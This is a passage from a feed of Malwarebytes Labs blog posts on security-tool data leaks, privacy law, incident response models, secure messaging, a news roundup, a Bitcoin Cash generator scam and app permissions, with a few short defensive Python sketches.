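VT_FILE_LOOKUP = "https://www.virustotal.com/api/v3/files/{sha256}"

def hash_lookup_url(file_bytes):
    """Build a hash-only lookup URL; this leaks a digest, not the file."""
    digest = hashlib.sha256(file_bytes).hexdigest()
    return VT_FILE_LOOKUP.format(sha256=digest)

if __name__ == "__main__":
    with open(__file__, "rb") as fh:
        print(hash_lookup_url(fh.read()))
```

If the hash is unknown to VT, that is the moment to stop and think before uploading, not a reason to auto-submit.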

When it comes to using other reputable security tools, it is wise to read over all of the documentation and make sure you understand how and when the given tool will incorporate VT.

Case 3: VT email scanning service

I have unfortunately seen many articles and forum posts online where people give advice to use the VT attachment scan service. Basically, by forwarding an email with its attachment to VT’s scanning address, the sender can receive a response as to what VT found regarding the attachment.

Please do not take such advice unless you are sure the document you are scanning contains no private data. It is a risky game. If you are worried about malicious documents infecting your computer, then the logical conclusion would be to buy an antivirus with a good reputation and the technology to block malicious documents.

If you choose to send all your potentially private emails to VT, searchable by anyone, then you’re essentially undoing any potential security or privacy benefits by exposing all your data anyway. What damage is a spyware going to do when you’ve already sent your sensitive data out to a public database?

EXE files problem

The next case I want to talk about, while less sensitive, is a lot more likely to be overlooked.

In a corporate environment, we cannot rely on everyone to manually submit attachments or files to security engineers; all of this is automated. From my past experience and from speaking with fellow security engineers, I have seen that it is quite common for all executables entering a corporate network to automatically get scanned with various plugins tied to a given platform. I will highlight Carbon Black, an enterprise endpoint detection and response (EDR) platform, in this case, although many other security providers have this problem as well.

When a new exe makes its way into a network, Carbon Black stores it, but also has the ability to cross reference the given file with various plugins and tools that are built in or added to the platform. For example, you can click a bubble on any given file in your network, which will give you its results against the WildFire sandbox. And of course, the topic that has received so much heat in the media this year—the VT plugin.

Now, while they have fixed the issues on submitting documents to avoid leaking data, they still do submit exes. But wait, so what? Isn’t that exactly what we want it to do?

Correct, it is. Automation is what every corporation aims for in its security infrastructure. There is nothing wrong with the root idea of submitting and scanning exes flowing through the network. However, automation sometimes comes with a tradeoff if not properly planned.

I have evaluated the security infrastructure of many corporate networks and in these evaluations, I have seen that in this attempt to scan all new exes for malware, the company’s in-house executables end up getting scanned as well.

So now, confidential exes are unknowingly being exposed and leaking arguably more sensitive data and intellectual property. In addition, think for a moment about how software developers typically code. While they are testing functionality, it is common for a developer to hard code some credentials, paths, or other revealing information for a test build. Sure, after they are done, for the production build, it will likely get changed to hide this information and make it dynamic, but in the meantime, these demo builds have been picked up by the EDR and scanned through various plugins.

Again, this is not a problem with the EDR itself, it is a problem with its implementation, entirely the responsibility of the customer using the software.

Remediation and prevention

Now this does not mean we need to abandon use of security tools for fear of data leaks; it simply means we need to make some adjustments. So what can a business do to protect against leaking their own data to the public?

There are many options which will depend upon the compliance requirements and needs of a given company, but I have a few base considerations I recommend.

Rules-based segmentation

Rather than having a blanket automation where everything is automatically scanned, I always recommend segmenting the actions taken when the EDR sees a new file based on user groups. For example, maybe users in the developers’ group do not have their binaries residing in a specific directory sent for auto scanning.

However, this is easier said than done, because simply enabling this type of rule can be catastrophic and may essentially give a developer free rein to secretly develop malware. That’s why, when one security rule is relaxed for a given user, another must be tightened to make up for it. In this theoretical scenario, we have just given a developer a free pass to not have his executables scanned. We have closed one door but opened another.

To make up for this, one thought might be to keep heavy watch on the IPs and ports that the dev machines are allowed to communicate over. If the developer needs to communicate with a specific IP for his software, he should get approval in advance from the security engineers. At this point, we can let the developer go ahead and create malware, but if his MAC address or IP is seen attempting communication with a non pre-approved IP or over a non pre-approved port, fire alerts. This type of rule is trivial to create using a good EDR platform.
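
As a toy model of that compensating rule, the sketch below (addresses, ports, and names are all illustrative) flags any observed connection from a dev machine that is not on the pre-approved list:

```python
def check_connections(observed, allowlist):
    """Return the (ip, port) pairs that should fire alerts: any
    observed connection not pre-approved by the security engineers."""
    allowed = set(allowlist)
    return [conn for conn in observed if conn not in allowed]

if __name__ == "__main__":
    # Pre-approved destinations for this developer's software
    allowlist = [("10.0.0.5", 443), ("10.0.0.9", 8080)]
    # Connections actually seen from the dev machine
    observed = [("10.0.0.5", 443), ("203.0.113.7", 4444)]
    print(check_connections(observed, allowlist))  # the suspicious beacon
```

A real EDR rule would key on the machine’s identity and fire an alert rather than print, but the allowlist-and-alert logic is the same.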

The roles and expected behavior of a given employee’s machine must be fully understood beforehand to be able to keep proper control over a network.

Understand the tools you use

It is important to understand that security tools are made for generic use. The creators do not know specifically what your company does and what your privacy policies are. They do not know whether you will be developing your own software onsite or whether you are simply using the tool to scan downloaded files.

That being said, it is up to you, the user or security engineer in charge of evaluating, to make sure you understand all of the functionality and options a tool gives you.

A developer who creates a tool to scan email attachments automatically with VT is not necessarily acting maliciously. For some users, say one who does not create or store sensitive information in documents, this might be the best tool in the world, exactly what they need to automate their operations. For another company that sends its contracts in the form of Word documents, it might be catastrophic. At the end of the day, the blame cannot be placed on a tool that behaved exactly as advertised. It’s up to the user to do her own research and understand what the tool does and how it will affect privacy and security.

The post Caution: Misuse of security tools can turn against you appeared first on Malwarebytes Labs.

What should a US federal data privacy law ideally include?

Malwarebytes - Wed, 07/10/2019 - 15:00

In the constant David-and-Goliath struggle between digital privacy advocates and corporate privacy invaders, the question of how to legally protect Americans with a comprehensive, federal data privacy law provides conflicting answers. Advocates want protections, which Big Tech interprets as restrictions.

As of today, there is no one digital privacy law to rule them all. While a few state laws exist that protect consumer privacy here in the US, overarching federal legislation, such as the General Data Protection Regulation (GDPR) in Europe, has not yet penetrated the market.

US-based corporations must comply with GDPR if they have a global presence, but that’s only for their European customers—and many have found convenient workarounds. Who will protect the American user? Smaller tech? Privacy-forward tech? What about we-don’t-have-a-lobbying-war-chest tech? How do they feel about a federal privacy law?

For months, Malwarebytes Labs has reported on data privacy laws in the United States and abroad. But the question of federal legislation that applies to the entire country has gone unanswered, as multiple Senate proposals have yet to move forward.

Further, despite Big Tech’s recently-avowed commitment to regulation, those same companies are reportedly funding efforts to dismantle newly-enacted stateside data privacy protections.

But earlier this year, a group of tech companies stood opposed. They wanted to strengthen one of those same privacy protections. This tech group included some of the most recognizable company names in user privacy: DuckDuckGo, Ghostery, ProtonMail, Lavabit, Brave, Vivaldi, Purism, and Disconnect.

We asked those companies to broaden their sights beyond state legislation. What did they want, if anything, from a federal data privacy law for the United States?

What’s the goal?

For many of these privacy-forward companies, a federal data privacy law would be far from restrictive. Instead, it is considered necessary.

Todd Weaver is the founder and chief executive of Purism. He supports a federal data privacy law, so long as it isn’t stripped of meaningful user protections and doesn’t create barriers to success for startups and mid-sized companies. Federal legislation could be, Weaver said, the one way to finally defend the public from an ongoing digital privacy crisis.

“We’re talking about the exploitation of people in the digital world, and this is a giant problem,” Weaver said. He continued:

“The problem can be boiled down to things that nobody should ever know. Those are where people are, what people do, and who talks to whom.”

In the US, those pieces of information are far from protected, though. Where we are, what we do, and who we talk to fuels a massive corporate surveillance machine driven by social media behemoths, aggressive online tracking, and unseen data brokers, all motivated by continuously-climbing advertising revenue. No current law forbids much of this.

So how do we fix it? Here are a few ideas from privacy advocates.

Like the CCPA…but better

Last year, California’s then-governor Jerry Brown signed the California Consumer Privacy Act (CCPA). Effective January 1, 2020, the CCPA grants Californians the right to know what data is collected on them and whether that data is sold, the option to opt out of those sales, and the right to access that data.

In April, privacy search engine DuckDuckGo, joined by 23 other technology companies, sent a letter to the California Assembly’s Privacy Committee asking that the law be bolstered. The requested improvements, DuckDuckGo wrote, would include the right to opt out of having information shared—not just sold—and the right to sue companies that violated any privacy provision of the CCPA.

Helen Horstmann-Allen, chief operating officer at email provider Fastmail (which signed onto DuckDuckGo’s letter) said she would appreciate seeing legislation similar to CCPA go national.

“We were pleased to see California take the lead with their privacy laws to reflect how companies do business today. Expanding the scope of privacy legislation recognizes that companies don’t need to sell data to violate consumer privacy,” Horstmann-Allen said. “We’d love to see this type of legislation move on the national level as well. Privacy rights shouldn’t end at the state line.”

Jeremy Tillman, director of product at the ad-blocking browser extension Ghostery, made similar comments in a 2018 opinion piece for The Hill:

“If there is serious traction for federal consumer privacy legislation, which there absolutely should be, the California Consumer Protection law can serve as a solid template to model future laws after.”

A consumer’s right to sue for privacy violations

California’s privacy law received a major setback this year when a proposed amendment did not pass one of the state’s Senate committees. The amendment, SB 561, would have given Californians the right to sue a company that violated any privacy rights described in the CCPA.

Currently, CCPA only gives Californians the right to sue a company for the harm of a data breach. Though a novel inclusion when compared to the dearth of privacy protections across the nation, some argue that broader opportunities to go to court are needed.  

“If you can’t sue or do anything to go after these companies that are committing these atrocities, where does that leave us?” Weaver said. “We’ve already seen that with the CCPA in California.”

At least 40 bills have been introduced in California with the near-uniform purpose to amend the CCPA into a weaker version of itself. AB 846, for example, would have limited the CCPA’s discrimination prohibition. AB 873 would have pared down the definition of individuals’ personal information.

More attempts to weaken the CCPA remain, Weaver said.

“One of those bills is just about defanging the entire regulation,” Weaver said. “If you do that, if you defang, [the law] is just paper.”

Transparent data collection practices

Ghostery’s Tillman echoed the above sentiments that any federal data privacy legislation should “hold big tech accountable for their deceptive data collection practices,” but he added:

“[It] should require that any data collection occur as part of a transparent, easy-to-understand transaction where the cost to consumers is clear, enabling them to be knowing and voluntary participants in an ad-supported and data-driven economy.”

Design for interoperability with GDPR

Johnny Ryan, chief policy officer for the privacy-focused web browser Brave, testified earlier this year before the US Senate Judiciary Committee about a potential federal data privacy law. Such a law, Ryan said, should hew closely to the standards of a popular, across-the-pond framework: the European Union’s General Data Protection Regulation (GDPR).

“We view the GDPR as essential,” Ryan said in an email to Malwarebytes Labs. “It can establish the conditions to allow young, innovative companies like ours to flourish.”

Ryan told the committee that two elements within the GDPR can help both protect Americans’ data and give opportunities for small companies to meaningfully compete with Silicon Valley’s biggest, most entrenched businesses. Those two provisions are the “purpose limitation” principle—which protects people’s data from being used in ways they could not anticipate—and the ability to easily opt out of a company’s data collection.

“These two GDPR tools, the ‘purpose limitation principle’, plus the ease of withdrawal of consent, enable freedom,” Ryan told the committee. “Freedom for the market of users to softly ‘break up’—and ‘un-break up’—big tech companies by deciding what personal data can be used for.”

Further, Ryan said to Malwarebytes Labs, a US federal data privacy law inspired by GDPR—particularly in defining concepts like personal data, opt-in consent, and profiling—will provide technology companies with a streamlined path toward compliance, since many have already worked toward complying with GDPR.

“The standard of protection in a federal privacy law, and the definition of key concepts and tools in it, should therefore be compatible and interoperable with the emerging GDPR de facto standard that is being adopted globally,” Ryan said.

Do not undermine states’ individual data privacy laws

Ever since Americans learned about a European consultancy’s effort to sway the 2016 US Presidential election by harvesting the Facebook data of tens of millions of non-consenting users, individual US states have clamped down hard on data misuse against their residents.

California passed the CCPA. Vermont passed a law regulating data brokers. Maine passed a law placing restrictions on how Internet service providers share Mainers’ personal information.

But those state laws could be in trouble if a federal data privacy law calls for their nullification. Such a provision exists both in Senator Marco Rubio’s data privacy bill and in the draft privacy legislation written by the Center for Democracy and Technology.

This superseding provision—called “pre-emption”—is unacceptable to Brave.

“The federal law should be of equal or higher standard to state laws, and should not undermine state laws,” Ryan said.

A “Digital Bill of Rights”

When explaining what he would like to see in a federal privacy bill, Weaver repeatedly returned to the idea of a “Digital Bill of Rights.” It is an idea his company has already acted on, having written out and implemented several of the principles.

Included in the company’s Digital Bill of Rights are:

  • The right to change providers
    • Users can take all their data and move it to another service
  • The right to protect personal data
    • Users “own and control” the master keys to encrypt their data
  • The right to verify
    • Users can analyze the source code of software operating locally on their machines
  • The right to not be tracked
    • Users know about and have access to all the collections and uses of their data
    • Users can “obtain, correct, or permanently delete personal data”
    • User data that is collected for a purpose is deleted after that purpose is fulfilled
  • The right to access
    • Users will not be “discriminated against nor exploited based on personal data”

A digital bill of rights is a rare find for any technology company, but Weaver explained that Purism is not guided by the same rules as Big Tech. Because Purism has incorporated as a “social purpose company,” it is not obliged to maximize shareholder value; instead, it is obliged to fulfill the principles written in its articles of incorporation.

Those “Purist Principles,” Weaver explained, guide the company every day.

“It allows everyone, including me, our employees, to advance our causes before caring about profits or maximizing shareholder value,” Weaver said.

One last, important aspect about the rights described in the Purist Principles is that none of them can be removed by a company’s terms of service.

“If this was established at the federal level,” Weaver said, “this is saying ‘These are your rights, and nobody can remove these rights inside a Terms of Service [agreement] that nobody reads.’”

The post What should a US federal data privacy law ideally include? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Enterprise incident response: getting ahead of the wave

Malwarebytes - Wed, 07/10/2019 - 14:19

Enterprise defenders have a tough job. In contrast to small businesses, large enterprises can have thousands of endpoints, legacy hardware from mergers and acquisitions, and legacy apps that are business critical and prevent timely patching. Add to that a deluge of indicators and metadata from the perimeter that may represent the early stages of a devastating attack—or may be nothing at all.

So how do network defenders get out from behind the 8-ball? How do leaders bring an effective strategy to bear in mobilizing incident response (IR) resources? To deal with knotty problems like this, security researchers have developed a number of IR models to help bring a maximally sane, efficient strategy to network defense efforts.

The cyber kill chain

In 2011, Lockheed Martin developed the cyber kill chain. Borrowed from the US military, the kill chain breaks most cyberattacks down into seven constituent phases (reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on objectives), and theorizes that forcing a hard stop at any one of those phases will prevent the entire attack. So if an attack is caught at the installation phase and remediated, the attacker can no longer proceed to act on objectives. But if endpoint protection can stop an attack at the delivery phase, so much the better.

The general idea that makes the kill chain such an appealing way of looking at an attack is that you can’t block everything. Malspam will get through perimeter defenses. Reconnaissance will sometimes happen whether you like it or not. Exploitation will definitely happen with that one employee who is committed to clicking on everything.

So rather than throwing up a Maginot line of ever-increasing defenses at ever-escalating costs, the kill chain suggests that defenders have seven opportunities to shut down an attack, and can fight on a battlefield of their choosing. While it would be best to identify an attack at the Reconnaissance phase, killing it at the Delivery phase can keep the network just as safe, without burning out your SOC by expecting them to catch everything. Check out some more details on how the kill chain is implemented here.
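
The model’s leverage comes from that strict ordering: a stop at any phase prevents everything after it. A minimal sketch in Python (the phase names are the standard Lockheed Martin seven; the function name is ours, for illustration only):

```python
# The seven phases of the Lockheed Martin cyber kill chain, in order.
KILL_CHAIN = [
    "reconnaissance",
    "weaponization",
    "delivery",
    "exploitation",
    "installation",
    "command_and_control",
    "actions_on_objectives",
]

def phases_prevented(stopped_at: str) -> list[str]:
    """Stopping an attack at one phase prevents every later phase."""
    return KILL_CHAIN[KILL_CHAIN.index(stopped_at) + 1:]
```

A catch at "delivery", for example, spares the SOC from ever having to deal with exploitation, installation, and everything after.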

The ATT&CK model

A somewhat more granular model, ATT&CK is a matrix that maps a lengthy list of attacker capabilities to a 12-step attack chain. Often seen as a complement to the kill chain, working through the ATT&CK matrix can be a useful exercise in matching tactics, techniques, and procedures (TTPs) already observed to attack chain phases to determine defense priorities. Among the model’s use cases, threat data sharing is one of the most valuable: mapping out a full matrix of observed TTPs is a quick way to share a snapshot of the threat landscape across multiple defensive groups or different organizations.
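
A shared snapshot of that kind might be sketched as follows (the tactic names follow the ATT&CK matrix; the techniques listed are illustrative examples, not real telemetry):

```python
import json

# Illustrative matrix fragment: observed techniques keyed by ATT&CK tactic.
observed = {
    "initial-access": ["spearphishing attachment"],
    "execution": ["powershell"],
    "persistence": ["registry run keys"],
    "lateral-movement": [],  # nothing observed for this tactic yet
}

def snapshot(matrix: dict) -> str:
    """Serialize only the tactics with observed activity, ready to share."""
    active = {tactic: ttps for tactic, ttps in matrix.items() if ttps}
    return json.dumps(active, indent=2, sort_keys=True)
```

A receiving SOC can diff such a snapshot against its own matrix to see at a glance where an adversary has been active.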

Critiques of IR models

Most critiques of the kill chain and its more recent variants boil down to “what about X?” This is a little bit misguided, as attacker capabilities change over time, and a comprehensive matrix of TTPs would be exhausting to look at, and probably inaccurate in some way. What these models are really meant to assist with is bringing threat intelligence and strategy into the SOC to eliminate blind reactivity. Using any strategic model at all can bring better results than blind monitoring.

Intelligence: the bigger point

The takeaway for the SOC leader or CISO looking to implement an IR model is not picking the one, singularly correct model. Rather, implementing strategic defense in any form can boost the SOC’s responsiveness, efficiency, and accuracy. Having a well-mapped matrix tying observed indicators to specific attack phases can be an aid in prioritizing responses, as well as judging severity for a successful attack caught midstream.

Most importantly, having an incident response model forces SOC staff to respond to an incident in a strategic manner, addressing threats furthest along an attack chain first, and using threat staging to derive intelligence on potential ongoing attacks. As with conventional warfare, beating back attacks and winning the war depends on having a plan.
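
That triage rule, respond first to whatever is furthest along the chain, can be sketched in a few lines (the incident IDs and phase assignments below are hypothetical):

```python
# Phase order from the Lockheed Martin kill chain, earliest to latest.
KILL_CHAIN = ["reconnaissance", "weaponization", "delivery", "exploitation",
              "installation", "command_and_control", "actions_on_objectives"]

# Hypothetical open incidents: (ticket ID, furthest phase observed).
incidents = [
    ("INC-101", "delivery"),
    ("INC-102", "command_and_control"),
    ("INC-103", "reconnaissance"),
]

def triage(open_incidents):
    """Order incidents so the threat furthest along the chain comes first."""
    return sorted(open_incidents,
                  key=lambda inc: KILL_CHAIN.index(inc[1]),
                  reverse=True)
```

Here an active command-and-control channel outranks a malicious attachment caught at delivery, which in turn outranks a port scan.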

Stay vigilant, and stay safe.

The post Enterprise incident response: getting ahead of the wave appeared first on Malwarebytes Labs.


How to securely send your personal information

Malwarebytes - Mon, 07/08/2019 - 16:00

This story originally ran on The Parallax and was updated on July 3, 2019.

A few months ago, my parents asked a great security question: How could they securely send their passport numbers to a travel agent? They knew email wasn’t safe on its own.

Standard email indeed isn’t safe for sending high-value personal information such as credit card or passport numbers, according to security experts such as Robert Hansen, CEO of intelligence and analysis firm OutsideIntel, now part of Bit Discovery.

“Email sometimes has good cryptography but often does not,” Hansen says. When sending between Gmail accounts or within a company, he adds, secure transport “probably isn’t an issue.” But people should ask themselves, “Can somebody steal the data when it’s at rest?”

There’s no 100 percent hack-proof way to send your personal information across the Internet. But thanks to the development of end-to-end encryption, which secures data from even the company providing the encryption, there are tools and techniques you can use to make the process safer for you and the identification numbers we use to rule our lives.

Here are three expert tips for securely sending someone your personal information when planning your summer vacation, buying your next house, or just sending documents to your doctor’s office (when they don’t have their own secure messaging system).

Tip 1: Use an app with end-to-end encryption

The use of encryption has been increasing “since the mid-1990s,” notes security expert Bruce Schneier, thanks to a seminal court case allowing companies to work on computer cryptography without having to first seek the government’s permission. 

Some phone apps protect your text messages using end-to-end encryption. We have highlighted several of the best in a guide to apps offering end-to-end encryption. Here are a few we find exceptionally useful for securely sending personal information.

WhatsApp, used by more than 1.5 billion people, is available on every major platform and several minor ones, including an easy-to-use desktop browser app, and it provides end-to-end encryption by default. If you use WhatsApp (acquired by Facebook in 2014), you use end-to-end encryption. It’s that simple, and its popularity means that you might not have to convince your intended recipient to install it.

WhatsApp’s encryption tech is actually provided by Open Whisper Systems, which makes its own end-to-end encrypted text and voice app, Signal. So which app should you use? Signal arguably has two advantages over WhatsApp, at least from a security perspective. First, Signal doesn’t store any metadata about its chats, while WhatsApp does; metadata isn’t the content of messages, but it can help identify the type of content being sent. Second, Signal can be set to auto-delete messages, which is effective as long as the recipient hasn’t taken a screenshot or otherwise copied the content of the message.

Signal is also open-source, which means that the code on which it’s built is subject to independent review. WhatsApp’s development is closed, so no one outside the company can poke around in its code. While Signal is only for iPhone and Android, both Signal and WhatsApp can comfortably exist on the same device—they don’t conflict with each other. (Sometimes, however, Signal struggles to let its users go.)

As of July 2019, WhatsApp and Signal are the only two end-to-end encrypted messaging apps for which the advocacy nonprofit Electronic Frontier Foundation offers installation instructions in its Surveillance Self-Defense Tool Guide. The organization elsewhere in its guide recommends the end-to-end encrypted messaging app Wire. Wire works on Android, iOS, and desktops. One of Wire’s benefits is that it doesn’t require you to share your phone number to use the service, instead relying on usernames. That can help minimize the ability of others to track you. But it also stores conversation threads in plaintext when you use it across multiple devices.

End-to-end encrypted Wickr also allows users to delete messages they’ve sent after they’ve been viewed. Once you’ve deleted a message you’ve sent, you don’t have to worry about the recipient’s device storing it. However, because Wickr runs only on iOS and Android, and it has no password recovery method, you might have a hard time convincing your recipient to use it. (Editor’s note: Since this story was originally published, Wickr is still available to all users but is focused on businesses, not consumers.)

Tip 2: If you must use email…

If you must use email—perhaps you’re sending the Panama Papers—strongly consider learning about Pretty Good Privacy (PGP). The challenge with PGP is that not only do you have to use it correctly, with different instructions for Windows, Mac, and Linux, but so does your recipient. You can also consider sending a password-protected ZIP file, as long as the password isn’t in the same email you send.

Electronic Frontier Foundation technologist Jeremy Gillula advises against creating a simple code for sending important numbers, such as changing all 1s to 2s. “If you’re using simple cipher, might as well call up the recipient and tell them over the phone,” he says.
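
To see why, consider how trivially such a scheme is undone. A hypothetical sketch of the digit-shifting example (the function names are ours, and this is not any real cipher):

```python
def naive_encode(text: str) -> str:
    """The "simple code": shift each digit up by one (1 -> 2, 9 -> 0)."""
    return "".join(str((int(c) + 1) % 10) if c.isdigit() else c
                   for c in text)

def trivially_decode(text: str) -> str:
    """Anyone who guesses the scheme reverses it just as easily."""
    return "".join(str((int(c) - 1) % 10) if c.isdigit() else c
                   for c in text)

card = "4111 1111 1111 1111"
scrambled = naive_encode(card)  # "5222 2222 2222 2222"
assert trivially_decode(scrambled) == card
```

There is no key and no secret beyond the scheme itself, so the scrambling offers essentially the same protection as plaintext.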

Some email networks are encrypted within their own systems. If you know that your recipient is using Gmail, and you’re using Gmail, the content of the messages will be protected from snooping while being sent, Gillula says. “It can thwart a passive eavesdropper, but you’re still susceptible to active attacks.”

Tip 3: Ask questions

If you’re not sure about your recipient’s computer security, ask him or her about it. Hansen tells a story about trying to get a mortgage, and the mortgage company wanted “unbelievable amounts of information. I took one look at their website and found a number of different flaws in it.” 

He ended up finding a larger, more computer-savvy mortgage company. Good starter questions include:

  • Is the data you transmit encrypted in transit, and are the databases that store it encrypted on disk?
  • Is access to your information systems handled on a per-user basis, or does everybody use the same username and password?

If the data isn’t encrypted in transit and at rest, and if there’s only one username and password for accessing customer data, keep looking for a different service provider, Hansen says. From there, the questions you ask depend on whether you’re working with a travel agent, a health care provider, or a mortgage firm.

The post How to securely send your personal information appeared first on Malwarebytes Labs.


A week in security (July 1 – 7)

Malwarebytes - Mon, 07/08/2019 - 15:08

Last week on Malwarebytes Labs, we explained what to do when you find stalkerware, how cooperating apps and automatic permissions are setting you up for failure, and why you should steer clear of Bitcoin Cash generators.

Other cybersecurity news:
  • A former Chief Information Officer (CIO) of Equifax has been issued a prison sentence for insider trading on the firm’s disastrous data breach before the incident became public knowledge. (Source: ZDNet)
  • A new Ryuk ransomware campaign is spreading globally, according to a warning issued by the UK’s National Cyber Security Centre (NCSC). (Source: DarkReading)
  • Orvibo smart home devices leaked billions of user records including logs that contained everything from usernames, email addresses, and passwords, to precise locations. (Source: VPNMentor)
  • Chinese authorities have decided to spy on foreigners crossing the border by installing spyware on Android phones. (Source: iPhoneHacks)
  • Germany’s cybersecurity agency is working on a set of minimum rules that modern web browsers must comply with in order to be considered secure. (Source: ZDNet)
  • An ongoing attack in the OpenPGP community makes users’ certificates unusable and can essentially break the OpenPGP implementation of anyone who tries to import one of the certificates. (Source: Duo Security)
  • Researchers have discovered the first known malware strain, dubbed Godlua, that uses the DNS over HTTPS protocol. (Source: TechSpot)
  • IronPython, darkly: how researchers uncovered an attack on government entities in Europe. (Source: PT Security)
  • Attunity, a company that is currently working with at least half of all Fortune 100 companies, including Netflix, leaked both its clients’ and its own data. (Source: BleepingComputer)
  • The US Cyber Command has issued an alert that hackers have been actively going after CVE-2017-11774. The flaw is a sandbox escape bug in Outlook. (Source: The Register)

Stay safe, everyone!

The post A week in security (July 1 – 7) appeared first on Malwarebytes Labs.


Steer clear of Bitcoin Cash generators

Malwarebytes - Wed, 07/03/2019 - 18:19

Here’s an interesting evolution on a well-worn scam, taking one profit generating fakeout and turning it into something else entirely.

For years, gamers have been stuck navigating the treacherous waters of fake video game giveaways. With so many genuine gaming giveaways around, you’re never quite sure if a site offering free Xbox points, Steam credits, or downloadable content is going to do what it claims.

Typically, the site will ask you to pick your reward, then “verify you’re a human” or just help a fictitious process along by clicking an ad, filling in a survey, or downloading a file and hoping it isn’t malware.

The gamer never gets their rewards. They may well end up with a few unexpected visitors on their desktops, though.

What’s the change here?

One enterprising individual has clearly had enough of the video game wilderness and decided to try and make money in a less explored realm.

Step up, Bitcoin—or to be more accurate, Bitcoin Cash. Bitcoin Cash is a form of cryptocurrency that went its own way in 2017, and then split again in what I can only call the great Bitcoin Cash war of 2018, when two rival groups imagined vastly different directions for the fledgling currency.

The intention, with or without the split, was to create a digital coin that functioned more as a currency than as a digital investment. It is this fertile ground that sets the scene for the site we’re about to look at: Bitcoin-cash-generator(dot)com.


Getting things started

The website claims to “inject exploits into Bitcoin Cash pools and blockchain.” It attempts to put pressure on visitors right from the start, claiming to limit use of the tool to 30 minutes per IP address, up to a maximum profit of 2.5 BCH. That’s around £815/US$1,024, so it’s a tidy bit of profit for jumping through some hoops. For reference, the minimum amount a visitor can ask for is 0.1 BCH, roughly £32/US$41.

Whatever slice of the pie a visitor picks, they’re going to get a little bit of money back…Or are they?

What hoops do we have to jump through?

Unlike many similar gaming-themed scam sites, surprisingly little. With no social aspect, there’s no real reason to plaster share buttons all over the place or ask to send to friends. This is all about the site visitor only. They simply have to “Enter your Bitcoin cash address bellow [sic]” and move a slider to select their desired amount. (And really, who will pick anything less than the maximum?) Then, they hit the start button.

Pop-ups abound of other IP addresses receiving amounts. “People” in the chatroom confirm it works great. Any hesitation a user might have had is likely gone at this point.


After confirming the desired amount, we’re off to the “this website is doing nothing at all” races.

Constructing the lie

Those familiar with the fake game points/free gift card websites will know the drill. A collection of random boxes pops up, claiming to be hacking the Gibson. The more vaguely technical it all sounds, the better—anything that sells the vision of actual, honest-to-goodness exploits doing strange exploity things in the background.


“Injecting transfer requests into the blockchain.” I hate when that happens.


“Connecting to blockchain maintenance channel”

Well of course, it always helps when you connect to the old blockchain maintenance channel.

This one is a particular favourite of mine, as it’s every TV show’s attempt to show you some hacking on a screen in one hilarious image:


It also comes in handy for digging out multiple similar websites apparently using aspects of the same “We’re definitely hacking a blockchain, honest” code.

Multiple claims are made during the supposed hacking process that various attempts have failed to grab the cash, but they continue to persevere with it. Whereas many survey scams are almost instantaneous, these things really stretch out the illusion and make visitors wait a good few minutes while the titanic (fictional) battle rages in the background.

Eventually: success!

Sadly, success comes with a price. At this point, ye olde survey scam would ask you to fill in some offers. The free video game points site would ask you to install a dubious game or spam links across social media.


They need you to make a small donation, because of course they do. The site reads as follows:

The BitcoinCash network requires a small fee to be paid for each transaction that goes to the miners, else a transaction might never be confirmed. To ensure your transaction confirms consistently and reliably, pay the miners fee of 0.00316 BCH for this transaction at: [wallet address]

The request for 0.00316 BCH (roughly £1/US$1.30) is made regardless of whether you ask for the minimum/maximum amount of free cash. It doesn’t scale upwards.


Does this work?

The only thing that does work in all this is website visitors sending small amounts of cash to the people behind the website(s). As mentioned earlier, we’ve seen a few other sites doing much the same thing, such as freebtc(dot)uw(dot)hu and smartcoingenerator(dot)com:



Money trails

One interesting aspect of this type of scam branching out into digital coinland is increased visibility into the site owners’ antics. You can only go so far with survey scams or random social media profiles sending out spam links. Here, however, much of what constitutes a digital transaction is out there in the ether as a matter of public record.

There are entire sub-industries devoted to the analysis of Bitcoin transactions and how people make their digital cash flow down the money tubes. Generally, most folks’ experience of watching the Bitcoin wheels go ’round is focused on plain old Bitcoin. Bitcoin Cash is a little different, but you can still take a look behind the scenes.

The various sites we’ve seen offer up different addresses to send their “small transactions” to, and not all of them are focused on Bitcoin Cash. As for the one used on Bitcoin Cash Generator, the scammers do appear to have made a little money so far. It seems doubtful anyone is going to retire on it, though.

Another scam bites the dust

These Bitcoin Cash Generator sites are yet another sub-genre of survey scams that need to be filed under the “Something for nothing” label. If getting your hands on digital currency was this easy, everybody would be doing it. Instead, it’s a unique selling point for a handful of websites lurking in the corners of the net.

The post Steer clear of Bitcoin Cash generators appeared first on Malwarebytes Labs.


Cooperating apps and automatic permissions are setting you up for failure

Malwarebytes - Tue, 07/02/2019 - 16:53

“Hey you. Someone from HR has invited you to a meeting on Thursday. Would you like me to add the appointment to the calendar?”

Receiving an email notification when someone has invited you to a meeting is a feature that many professionals would not like to miss. Being able to log in at certain sites with your Facebook profile might be less indispensable, but nevertheless, it’s a heavily-used functionality. What do these two functions have in common? They both require an integration between different apps, and this opens up some security and privacy risks.

Some practical problems

Recently, we were reminded that the Google Calendar notifications in Gmail provided scammers with the option to spam users with phishing links to sites that are out to steal user credentials. Basically, scammers were able to craft the links in the invitation so that they included a malicious link. Since this is a relatively unknown method, most people wouldn’t think twice before clicking.

Logging into sites with social media profiles more than doubles the privacy risk of using either app separately. We say this because the data used by one app can easily be combined with that of the other, so cybercriminals can come away with double the payday.

You may have seen these login options for Twitter, Google, and Facebook. And Facebook combines these risks with yet another problem. Many people that canceled their Facebook accounts (or thought they did) have found that coming back to a site where they used to log in with their Facebook account revives said Facebook profile and opens it up for the world to see again.

Seems easier to just choose Facebook or Google, right?

And we haven’t even touched upon the apps that grab the permission to post on these social media sites on your behalf.

Underlying problems

Before we can start to look for effective countermeasures, we need to understand the real foundation behind these security risks. The most common and well-known problems include:

  • Apps that refuse to work without permissions or integrations they shouldn’t require.
  • Apps that grant other apps access to their data and settings.
  • Apps that are downloaded and installed by impulse. We tend to forget about them after we’ve stopped using them, but the data sharing goes on.
  • Jailbreaking, rooting, and sideloading apps. Apps installed from outside Google Play or the App Store are not as secure. Yet popular games like Fortnite were not available in Google Play, basically forcing their fans to compromise their safety to install the game.
  • Lack of awareness of the implications of granting permissions. Even when the permissions are clearly communicated (the app will be able to post to your Twitter account, for example), users have the inclination to think it will be all right to allow “trusted apps” full permissions.

Even though not every app in the Play Store is 100 percent trustworthy, you can be assured that at least some security checks have been performed. Google does require developers to limit their device permission requests to what’s really necessary for the app. And they do block many apps from the Play Store because they may be harmful, but there are always those that manage to slither through.

